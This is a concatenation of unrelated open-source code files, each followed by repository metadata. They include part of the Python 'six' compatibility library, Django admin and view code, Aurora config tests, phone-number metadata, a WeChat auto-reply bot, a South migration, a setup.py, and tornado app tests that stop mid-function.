def remove_move(name):
    """Remove item from six.moves.

    Looks first for a class-level MovedAttribute/MovedModule, then for an
    instance-level attribute on the ``moves`` module object; raises
    AttributeError when neither exists.
    """
    try:
        delattr(_MovedItems, name)
    except AttributeError:
        try:
            # Fall back to an attribute set directly on the moves instance.
            moves.__dict__.pop(name)
        except KeyError:
            raise AttributeError("no such move, %r" % (name,))
# Function/method internals were renamed between Python 2 and 3; record the
# version-appropriate attribute and method names as module constants so the
# accessor helpers below can be written once.
if PY3:
    _meth_func = "__func__"
    _meth_self = "__self__"
    _func_closure = "__closure__"
    _func_code = "__code__"
    _func_defaults = "__defaults__"
    _func_globals = "__globals__"
    # Dictionary iteration method names (".lists" targets multi-dict style
    # mappings that expose key -> value-list iteration).
    _iterkeys = "keys"
    _itervalues = "values"
    _iteritems = "items"
    _iterlists = "lists"
else:
    _meth_func = "im_func"
    _meth_self = "im_self"
    _func_closure = "func_closure"
    _func_code = "func_code"
    _func_defaults = "func_defaults"
    _func_globals = "func_globals"
    _iterkeys = "iterkeys"
    _itervalues = "itervalues"
    _iteritems = "iteritems"
    _iterlists = "iterlists"
# Use the next() builtin where available (Python 2.6+/3); otherwise fall back
# to calling the Python 2 .next() method directly.
try:
    advance_iterator = next
except NameError:
    def advance_iterator(it):
        return it.next()
next = advance_iterator
# callable() is absent in Python 3.0/3.1 (it returned in 3.2); emulate it by
# checking for __call__ anywhere in the type's MRO.
try:
    callable = callable
except NameError:
    def callable(obj):
        return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
    def get_unbound_function(unbound):
        # Python 3 has no unbound methods; a function fetched from a class
        # is already a plain function object.
        return unbound
    # Py3 MethodType takes (func, obj) directly.
    create_bound_method = types.MethodType
    # No special base class needed: Py3 iterators just define __next__.
    Iterator = object
else:
    def get_unbound_function(unbound):
        # Unwrap a Python 2 unbound method to its underlying function.
        return unbound.im_func
    def create_bound_method(func, obj):
        # Py2 MethodType additionally requires the class.
        return types.MethodType(func, obj, obj.__class__)
    class Iterator(object):
        # Gives Python 2 classes a .next() that delegates to the Python 3
        # style __next__() defined by the subclass.
        def next(self):
            return type(self).__next__(self)
    callable = callable
_add_doc(get_unbound_function,
         """Get the function out of a possibly unbound function""")
# Version-neutral accessors built from the attribute names chosen above.
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
def iterkeys(d, **kw):
    """Return an iterator over the keys of a dictionary."""
    # _iterkeys names the version-specific method ("keys" on Py3,
    # "iterkeys" on Py2); wrap in iter() since Py3 returns a view.
    keys_method = getattr(d, _iterkeys)
    return iter(keys_method(**kw))
def itervalues(d, **kw):
    """Return an iterator over the values of a dictionary."""
    # _itervalues names the version-specific method ("values" on Py3,
    # "itervalues" on Py2); wrap in iter() since Py3 returns a view.
    values_method = getattr(d, _itervalues)
    return iter(values_method(**kw))
def iteritems(d, **kw):
    """Return an iterator over the (key, value) pairs of a dictionary."""
    # _iteritems names the version-specific method ("items" on Py3,
    # "iteritems" on Py2); wrap in iter() since Py3 returns a view.
    items_method = getattr(d, _iteritems)
    return iter(items_method(**kw))
def iterlists(d, **kw):
    """Return an iterator over the (key, [values]) pairs of a dictionary."""
    # Targets multi-dict style mappings exposing lists()/iterlists();
    # plain dicts do not provide this method.
    lists_method = getattr(d, _iterlists)
    return iter(lists_method(**kw))
# Byte/text literal helpers: on Python 3, b() encodes a native string to
# bytes and u() is a no-op; on Python 2 the roles are reversed.
if PY3:
    def b(s):
        return s.encode("latin-1")
    def u(s):
        return s
    unichr = chr
    # Python 3.0/3.1 lack int.to_bytes, so build the bytes tuple by hand.
    if sys.version_info[1] <= 1:
        def int2byte(i):
            return bytes((i,))
    else:
        # This is about 2x faster than the implementation above on 3.2+
        int2byte = operator.methodcaller("to_bytes", 1, "big")
    byte2int = operator.itemgetter(0)
    indexbytes = operator.getitem
    iterbytes = iter
    import io
    StringIO = io.StringIO
    BytesIO = io.BytesIO
else:
    def b(s):
        return s
    def u(s):
        # unicode_escape interprets \uXXXX sequences as a u"" literal would.
        return unicode(s, "unicode_escape")
    unichr = unichr
    int2byte = chr
    # Py2 bytes indexing yields 1-char strings, so convert through ord().
    def byte2int(bs):
        return ord(bs[0])
    def indexbytes(buf, i):
        return ord(buf[i])
    def iterbytes(buf):
        return (ord(byte) for byte in buf)
    import StringIO
    StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
    # exec is a keyword on Python 2, so fetch the Py3 builtin by name to keep
    # this file parseable under both versions.
    exec_ = getattr(moves.builtins, "exec")
    def reraise(tp, value, tb=None):
        if value.__traceback__ is not tb:
            raise value.with_traceback(tb)
        raise value
else:
    def exec_(_code_, _globs_=None, _locs_=None):
        """Execute code in a namespace."""
        if _globs_ is None:
            # Default to the caller's globals/locals, matching the behavior
            # of a bare exec statement.
            frame = sys._getframe(1)
            _globs_ = frame.f_globals
            if _locs_ is None:
                _locs_ = frame.f_locals
            del frame
        elif _locs_ is None:
            _locs_ = _globs_
        exec("""exec _code_ in _globs_, _locs_""")
    # Three-argument raise is a syntax error on Python 3, so the Py2 version
    # of reraise must be compiled from a string inside this else branch.
    exec_("""def reraise(tp, value, tb=None):
    raise tp, value, tb
""")
# Use the real print function when the builtins module provides one
# (Python 2.6+ / 3); otherwise define a faithful emulation.
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
    def print_(*args, **kwargs):
        """The new-style print function for Python 2.4 and 2.5."""
        fp = kwargs.pop("file", sys.stdout)
        if fp is None:
            # print(file=None) is a silent no-op, as with the real builtin.
            return
        def write(data):
            if not isinstance(data, basestring):
                data = str(data)
            # If the file has an encoding, encode unicode with it.
            if (isinstance(fp, file) and
                isinstance(data, unicode) and
                fp.encoding is not None):
                errors = getattr(fp, "errors", None)
                if errors is None:
                    errors = "strict"
                data = data.encode(fp.encoding, errors)
            fp.write(data)
        # Emit unicode output only if any argument/separator/end is unicode,
        # mirroring Python 2's coercion rules.
        want_unicode = False
        sep = kwargs.pop("sep", None)
        if sep is not None:
            if isinstance(sep, unicode):
                want_unicode = True
            elif not isinstance(sep, str):
                raise TypeError("sep must be None or a string")
        end = kwargs.pop("end", None)
        if end is not None:
            if isinstance(end, unicode):
                want_unicode = True
            elif not isinstance(end, str):
                raise TypeError("end must be None or a string")
        if kwargs:
            raise TypeError("invalid keyword arguments to print()")
        if not want_unicode:
            for arg in args:
                if isinstance(arg, unicode):
                    want_unicode = True
                    break
        if want_unicode:
            newline = unicode("\n")
            space = unicode(" ")
        else:
            newline = "\n"
            space = " "
        if sep is None:
            sep = space
        if end is None:
            end = newline
        for i, arg in enumerate(args):
            if i:
                write(sep)
            write(arg)
        write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, *bases):
    """Create a base class with a metaclass.

    The returned throwaway base class is itself an instance of *meta*, so
    any class that inherits from it is constructed through *meta* on both
    Python 2 and Python 3.
    """
    namespace = {}
    return meta("NewBase", bases, namespace)
def add_metaclass(metaclass):
    """Class decorator for creating a class with a metaclass.

    Rebuilds the decorated class by calling *metaclass* with the original
    name, bases, and a copy of the class namespace.
    """
    def wrapper(cls):
        orig_vars = cls.__dict__.copy()
        # These are created by the class machinery and must not be copied
        # into the replacement class's namespace.
        orig_vars.pop('__dict__', None)
        orig_vars.pop('__weakref__', None)
        # Drop the per-slot descriptors; the rebuilt class recreates them
        # from the retained __slots__ entry.  BUG FIX: __slots__ may be a
        # single string naming one slot -- the original iterated it directly,
        # walking its *characters* and raising KeyError on pop.
        slots = orig_vars.get('__slots__')
        if slots is not None:
            if isinstance(slots, str):
                slots = [slots]
            for slots_var in slots:
                orig_vars.pop(slots_var)
        return metaclass(cls.__name__, cls.__bases__, orig_vars)
    return wrapper
| {
"content_hash": "5b269ad1ae2f677f6e906b0d379347e0",
"timestamp": "",
"source": "github",
"line_count": 585,
"max_line_length": 129,
"avg_line_length": 36.141880341880345,
"alnum_prop": 0.6356713805987797,
"repo_name": "pombreda/swarming",
"id": "176196c05b963beaff4f9be3659f05a5124f0547",
"size": "21143",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "appengine/components/third_party/six/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3014"
},
{
"name": "HTML",
"bytes": "249103"
},
{
"name": "JavaScript",
"bytes": "925519"
},
{
"name": "Protocol Buffer",
"bytes": "8868"
},
{
"name": "Python",
"bytes": "1495594"
},
{
"name": "Shell",
"bytes": "1267"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from accounts.models import UserGroup, UserProfile
# Register your models here.
class UserAdmin(admin.ModelAdmin):
    """Admin configuration for UserProfile; relies entirely on defaults."""
class GroupAdmin(admin.ModelAdmin):
    """Admin configuration for UserGroup; relies entirely on defaults."""
# Expose the account models in the Django admin with their default options.
admin.site.register(UserProfile, UserAdmin)
admin.site.register(UserGroup, GroupAdmin)
"content_hash": "a6e7aaefdda07004eec51daccb6cc13e",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 50,
"avg_line_length": 21.857142857142858,
"alnum_prop": 0.7647058823529411,
"repo_name": "vivianbuan/cs3240-s15-team20",
"id": "a9a47077a5d35080b5da6c8d7eb195ec7fdd328d",
"size": "306",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SecureWitness/accounts/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "5218"
},
{
"name": "CSS",
"bytes": "649"
},
{
"name": "HTML",
"bytes": "46566"
},
{
"name": "Python",
"bytes": "80790"
}
],
"symlink_target": ""
} |
import os
from io import BytesIO
import pytest
from twitter.common.contextutil import temporary_dir
from apache.aurora.client import config
from apache.aurora.client.config import get_config as get_aurora_config
from apache.aurora.config import AuroraConfig
from apache.aurora.config.loader import AuroraConfigLoader
from apache.aurora.config.schema.base import (
MB,
Announcer,
HealthCheckConfig,
Job,
Resources,
Task,
UpdateConfig
)
MESOS_CONFIG_BASE = """
HELLO_WORLD = Job(
name = 'hello_world',
role = 'john_doe',
cluster = 'test-cluster',
environment = 'test',
%(announce)s
task = Task(
name = 'main',
processes = [Process(name = 'hello_world', cmdline = '%(cmdline)s')],
resources = Resources(cpu = 0.1, ram = 64 * MB, disk = 64 * MB),
)
)
jobs = [HELLO_WORLD]
"""
MESOS_CONFIG_WITH_INCLUDE = """
%s
include(%s)
"""
MESOS_CONFIG_WITH_ANNOUNCE_1 = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': 'announce = Announcer(primary_port="http"),'}
MESOS_CONFIG_WITH_ANNOUNCE_2 = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': '''announce = Announcer(
primary_port = "http",
portmap = {"aurora": "http"}),
'''}
MESOS_CONFIG_WITH_INVALID_STATS = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': 'announce = Announcer(primary_port="http", stats_port="blah"),'}
MESOS_CONFIG_WITHOUT_ANNOUNCE = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': ''
}
def test_get_config_announces():
  """Configs with and without announcers should all parse into a job."""
  good_configs = [
      MESOS_CONFIG_WITH_ANNOUNCE_1,
      MESOS_CONFIG_WITH_ANNOUNCE_2,
      MESOS_CONFIG_WITHOUT_ANNOUNCE,
  ]
  for raw_config in good_configs:
    get_aurora_config('hello_world', BytesIO(raw_config)).job()
def test_get_config_with_broken_subscopes():
  """Nested, unbindable references should surface as InvalidConfig."""
  broken_config = MESOS_CONFIG_BASE % {
      'cmdline': 'echo {{hello[{{thermos.ports[http]}}]}}',
      'announce': '',
  }
  with pytest.raises(AuroraConfig.InvalidConfig) as cm:
    get_aurora_config('hello_world', BytesIO(broken_config)).job()
  assert 'Unexpected unbound refs' in str(cm.value.message)
def test_get_config_select():
  """Selection constraints match the right job and reject mismatches."""
  bio = BytesIO(MESOS_CONFIG_WITHOUT_ANNOUNCE)
  matching = dict(
      select_env='test',
      select_role='john_doe',
      select_cluster='test-cluster')
  get_aurora_config('hello_world', bio, **matching).job()
  # Rewind the stream and try again with selectors that match nothing.
  bio.seek(0)
  mismatched = dict(
      select_env='staging42',
      select_role='moua',
      select_cluster='test-cluster')
  with pytest.raises(ValueError) as cm:
    get_aurora_config('hello_world', bio, **mismatched).job()
  # The error names the one job that was actually available.
  assert 'test-cluster/john_doe/test/hello_world' in str(cm.value.message)
def test_include():
  """include() accepts a file name but rejects an open file object.

  Writes a base config plus a second config that include()s it by name,
  then checks that loading by path succeeds while passing the open file
  object raises InvalidConfigError.
  """
  with temporary_dir() as tmpdir:  # renamed from 'dir' (shadowed a builtin)
    hello_mesos_fname = "hello_world.mesos"
    hello_mesos_path = os.path.join(tmpdir, hello_mesos_fname)
    # BUG FIX: the original called os.path.join(dir, hello_mesos_path) with an
    # already-absolute second argument; os.path.join discards everything before
    # an absolute component, so the extra join was a confusing no-op.
    with open(hello_mesos_path, "wb") as hello_world_mesos:
      hello_world_mesos.write(MESOS_CONFIG_WITHOUT_ANNOUNCE)
      hello_world_mesos.flush()
      hello_include_fname_path = os.path.join(tmpdir, "hello_include_fname.mesos")
      with open(hello_include_fname_path, "wb+") as hello_include_fname_fp:
        hello_include_fname_fp.write(MESOS_CONFIG_WITH_INCLUDE %
            ("", """'%s'""" % hello_mesos_fname))
        hello_include_fname_fp.flush()
        # Loading by path resolves the relative include against the file's dir.
        get_aurora_config('hello_world', hello_include_fname_path)
        hello_include_fname_fp.seek(0)
        # Loading from an open file object must be rejected.
        with pytest.raises(AuroraConfigLoader.InvalidConfigError):
          get_aurora_config('hello_world', hello_include_fname_fp)
def test_environment_names():
  """Only devel/test/prod/staging<N> (lowercase, exact) names validate."""
  bad_names = ('Prod', ' prod', 'prod ', 'tEst', 'production', 'staging 2', 'stagingA')
  good_names = ('prod', 'devel', 'test', 'staging', 'staging001', 'staging1', 'staging1234')
  base_job = Job(
      name='hello_world', role='john_doe', cluster='test-cluster',
      task=Task(name='main', processes=[],
                resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
  # A job with no environment at all is rejected.
  with pytest.raises(ValueError):
    config._validate_environment_name(AuroraConfig(base_job))
  for env_name in good_names:
    config._validate_environment_name(AuroraConfig(base_job(environment=env_name)))
  for env_name in bad_names:
    with pytest.raises(ValueError):
      config._validate_environment_name(AuroraConfig(base_job(environment=env_name)))
def test_dedicated_portmap():
  """Announcer portmaps are only permitted on dedicated jobs."""
  base_job = Job(
      name='hello_world', role='john_doe', cluster='test-cluster',
      task=Task(name='main', processes=[],
                resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
  dedicated = {'dedicated': 'mesos-team'}
  # Accepted: no announcer, a dedicated job, a dedicated job with a portmap.
  config._validate_announce_configuration(AuroraConfig(base_job))
  config._validate_announce_configuration(
      AuroraConfig(base_job(constraints=dedicated)))
  config._validate_announce_configuration(
      AuroraConfig(base_job(constraints=dedicated,
                            announce=Announcer(portmap={'http': 80}))))
  # Rejected: a portmap with no constraints at all.
  with pytest.raises(ValueError):
    config._validate_announce_configuration(
        AuroraConfig(base_job(announce=Announcer(portmap={'http': 80}))))
  # Rejected: a portmap with constraints that are not 'dedicated'.
  with pytest.raises(ValueError):
    config._validate_announce_configuration(
        AuroraConfig(base_job(announce=Announcer(portmap={'http': 80}),
                              constraints={'foo': 'bar'})))
def test_update_config_passes_with_default_values():
  """Default update/health-check settings satisfy validation."""
  job = Job(
      name='hello_world', role='john_doe', cluster='test-cluster',
      task=Task(name='main', processes=[],
                resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
  config._validate_update_config(AuroraConfig(job))
def test_update_config_passes_with_min_requirement_values():
  """watch_secs just above the minimum health-check window validates."""
  job = Job(
      name='hello_world', role='john_doe', cluster='test-cluster',
      update_config=UpdateConfig(watch_secs=26),
      health_check_config=HealthCheckConfig(max_consecutive_failures=1),
      task=Task(name='main', processes=[],
                resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
  config._validate_update_config(AuroraConfig(job))
def test_update_config_fails_insufficient_watch_secs_less_than_target():
  """A watch_secs below the required window aborts validation."""
  job = Job(
      name='hello_world', role='john_doe', cluster='test-cluster',
      update_config=UpdateConfig(watch_secs=10),
      task=Task(name='main', processes=[],
                resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
  with pytest.raises(SystemExit):
    config._validate_update_config(AuroraConfig(job))
def test_update_config_fails_insufficient_watch_secs_equal_to_target():
  """A watch_secs exactly equal to the required window still fails."""
  job = Job(
      name='hello_world', role='john_doe', cluster='test-cluster',
      update_config=UpdateConfig(watch_secs=25),
      health_check_config=HealthCheckConfig(max_consecutive_failures=1),
      task=Task(name='main', processes=[],
                resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
  with pytest.raises(SystemExit):
    config._validate_update_config(AuroraConfig(job))
| {
"content_hash": "28e134b16ad0428d72c41299a0fc4210",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 86,
"avg_line_length": 33.531400966183575,
"alnum_prop": 0.6622964990635355,
"repo_name": "kidaa/aurora",
"id": "986061bf0829caa0509416a3de1778c2fa40a766",
"size": "7490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/test/python/apache/aurora/client/test_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "5916"
},
{
"name": "Groovy",
"bytes": "12868"
},
{
"name": "HTML",
"bytes": "43050"
},
{
"name": "Java",
"bytes": "2603733"
},
{
"name": "JavaScript",
"bytes": "101261"
},
{
"name": "Makefile",
"bytes": "6121"
},
{
"name": "Python",
"bytes": "1447260"
},
{
"name": "Ruby",
"bytes": "4315"
},
{
"name": "Shell",
"bytes": "91263"
},
{
"name": "Smarty",
"bytes": "25233"
},
{
"name": "Thrift",
"bytes": "53782"
}
],
"symlink_target": ""
} |
"""Auto-generated file, do not edit by hand. GG metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
# Short-number metadata for Guernsey (GG): patterns cover 3-6 digit short
# codes and the 112/999 emergency numbers.  Auto-generated -- regenerate
# rather than hand-edit the patterns below.
PHONE_METADATA_GG = PhoneMetadata(id='GG', country_code=None, international_prefix=None,
    general_desc=PhoneNumberDesc(national_number_pattern='[19]\\d{2,5}', possible_length=(3, 4, 5, 6)),
    emergency=PhoneNumberDesc(national_number_pattern='112|999', example_number='999', possible_length=(3,)),
    short_code=PhoneNumberDesc(national_number_pattern='1(?:0[01]|1(?:[12]|[68]\\d{3})|23|4(?:1|7\\d)|55|800\\d|95)|999', example_number='155', possible_length=(3, 4, 5, 6)),
    short_data=True)
| {
"content_hash": "c3db3eb59be03c15084b2c2c61a042e6",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 174,
"avg_line_length": 79.125,
"alnum_prop": 0.7061611374407583,
"repo_name": "samdowd/drumm-farm",
"id": "cfb8f7bd3ce2fd9717e23ffd64162c929033fdb9",
"size": "633",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "drumm_env/lib/python2.7/site-packages/phonenumbers/shortdata/region_GG.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "436732"
},
{
"name": "HTML",
"bytes": "578902"
},
{
"name": "JavaScript",
"bytes": "2356286"
},
{
"name": "Python",
"bytes": "33148901"
},
{
"name": "Roff",
"bytes": "28"
},
{
"name": "Shell",
"bytes": "3220"
}
],
"symlink_target": ""
} |
from wxpy import *
# Log in to WeChat (prints a QR code to scan on first run) and create the bot.
bot = Bot()
# Tuling chatbot backend; the placeholder string must be replaced with a real
# API key obtained from http://www.tuling123.com/ before running.
tuling = Tuling('你的 API KEY (http://www.tuling123.com/)')
# Find exactly one friend whose name matches the placeholder; ensure_one
# raises unless the search yields a single result.
my_friend = ensure_one(bot.friends().search('好友的名称'))
# Auto-reply to TEXT messages from that one friend via the Tuling chatbot.
@bot.register(my_friend, TEXT)
def tuling_reply(msg):
    tuling.do_reply(msg)
# Block the main thread so registered handlers keep running.
bot.start()
| {
"content_hash": "a583a6083d2e42a81f3d0b8d47d3be9d",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 57,
"avg_line_length": 17.142857142857142,
"alnum_prop": 0.6708333333333333,
"repo_name": "xcwstsoftware/wechat",
"id": "dc034eec74de794f93ee86bde752e78e92e7ab91",
"size": "254",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "youfouwechat/tuling_reply.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "85632"
}
],
"symlink_target": ""
} |
from south.db import db
from django.db import models
from knesset.tagvotes.models import *
class Migration:
    """South migration creating the TagVote table and its uniqueness rule."""
    def forwards(self, orm):
        # Adding model 'TagVote'
        db.create_table('tagvotes_tagvote', (
            ('id', orm['tagvotes.TagVote:id']),
            ('tagged_item', orm['tagvotes.TagVote:tagged_item']),
            ('user', orm['tagvotes.TagVote:user']),
            ('vote', orm['tagvotes.TagVote:vote']),
        ))
        db.send_create_signal('tagvotes', ['TagVote'])
        # Creating unique_together for [tagged_item, user] on TagVote:
        # each user may vote at most once per tagged item.
        db.create_unique('tagvotes_tagvote', ['tagged_item_id', 'user_id'])
    def backwards(self, orm):
        # Deleting unique_together for [tagged_item, user] on TagVote.
        db.delete_unique('tagvotes_tagvote', ['tagged_item_id', 'user_id'])
        # Deleting model 'TagVote'
        db.delete_table('tagvotes_tagvote')
    # Frozen ORM snapshot used by South to reconstruct model state at this
    # point in history; machine-generated, do not hand-edit.
    models = {
        'auth.group': {
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'unique_together': "(('content_type', 'codename'),)"},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'tagging.tag': {
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
        },
        'tagging.taggeditem': {
            'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)"},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
        },
        'tagvotes.tagvote': {
            'Meta': {'unique_together': "(('tagged_item', 'user'),)"},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'tagged_item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['tagging.TaggedItem']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tagvotes'", 'to': "orm['auth.User']"}),
            'vote': ('django.db.models.fields.IntegerField', [], {})
        }
    }
    complete_apps = ['tagvotes']
| {
"content_hash": "c11bb9458e9e94e94f5220a78dcc855c",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 142,
"avg_line_length": 59.14772727272727,
"alnum_prop": 0.541402497598463,
"repo_name": "livni/old-OK",
"id": "e0fd14aae0d12f70d67b8577d8a0888b51710fc7",
"size": "5206",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/knesset/tagvotes/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "31938"
},
{
"name": "JavaScript",
"bytes": "84209"
},
{
"name": "Python",
"bytes": "1179397"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
# Minimal packaging metadata for the HAMR 2016 hackathon project; every
# package under the repository root is discovered automatically.
setup(
    name='hamr2016',
    version='0.1',
    description='hackathon',
    author_email='all@sonalytic.com',
    packages=find_packages(),
)
| {
"content_hash": "534aa522a837356f79dc256da784b2cc",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 43,
"avg_line_length": 23,
"alnum_prop": 0.6231884057971014,
"repo_name": "tillahoffmann/hamr2016",
"id": "4de5510f40a382b770f53c9ceade8aa84a8b5341",
"size": "207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "20099865"
},
{
"name": "Python",
"bytes": "9860"
}
],
"symlink_target": ""
} |
from django.http import HttpResponse
from django.template import loader
# Create your views here.
def index(request):
    """Render the CareerTinder photo page with a hard-coded placeholder name."""
    template = loader.get_template('CareerTinder/photo.html')
    # Inline the context dict; the template only consumes 'name'.
    return HttpResponse(template.render({'name': 'John Doe'}, request))
| {
"content_hash": "d3e7918f66357b52baf0b87b2436fbcc",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 61,
"avg_line_length": 26.363636363636363,
"alnum_prop": 0.7103448275862069,
"repo_name": "sarojaerabelli/HVGS",
"id": "213e34cb13068d70e7b5532f5425ba41b997ceed",
"size": "290",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CareerTinderServer/CareerTinder/take_picture.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "158564"
},
{
"name": "HTML",
"bytes": "13119"
},
{
"name": "JavaScript",
"bytes": "70224"
},
{
"name": "Python",
"bytes": "32802"
}
],
"symlink_target": ""
} |
from __future__ import print_function
"""
test_app.py -- test pbm.app tornado application
"""
from contextlib import contextmanager
import tornado.testing
from urlobject import URLObject
from pbm.app import make_app
from pbm.app import BaseHandler
@contextmanager
def nop_auth(username="testuser"):
    """Temporarily stub out BaseHandler.get_current_user.

    While the context is active every handler sees ``{'name': username}`` as
    the current user, or no user at all when *username* is None.  The real
    method is restored on exit even if the body raises.
    """
    original = BaseHandler.get_current_user
    def fake_get_current_user(*args, **kwargs):
        return None if username is None else {'name': username}
    try:
        BaseHandler.get_current_user = fake_get_current_user
        yield
    finally:
        BaseHandler.get_current_user = original
class Test_app(tornado.testing.AsyncHTTPTestCase):
    """HTTP-level tests for the pbm tornado application."""
    def get_app(self):
        return make_app()
    def test_main_without_nop_auth(self):
        # Without a logged-in user, / ends up on the login page (effective_url
        # reflects the redirect target after tornado follows it).
        resp = self.fetch('/')
        self.assertEqual(resp.code, 200)
        self.assertEqual(URLObject(resp.effective_url).path, '/login')
        # Explicitly stubbing a None user behaves the same way.
        with nop_auth(None):
            resp = self.fetch('/')
            self.assertEqual(resp.code, 200)
            self.assertEqual(URLObject(resp.effective_url).path, '/login')
    def test_login(self):
        # The login form carries tornado's XSRF token field.
        resp = self.fetch('/login')
        self.assertEqual(resp.code, 200)
        self.assertIn('name="_xsrf"', resp.body)
    def test_main_as_testuser(self):
        # An authenticated user stays on / and sees the bookmarks link.
        with nop_auth():
            resp = self.fetch('/')
            self.assertEqual(resp.code, 200)
            self.assertEqual(URLObject(resp.effective_url).path, '/')
            self.assertIn('<a href="/bookmarks/chrome">', resp.body)
            # raise Exception((resp, dir(resp)))
    def test_bookmarks(self):
        with nop_auth():
            resp = self.fetch('/bookmarks/chrome')
            self.assertEqual(resp.code, 200)
            self.assertIn('''<div id="jstree">''', resp.body)
    def test_bookmarks_json(self):
        # The JSON endpoint returns a dict containing the bookmark_bar root.
        with nop_auth():
            resp = self.fetch('/bookmarks/chrome/json')
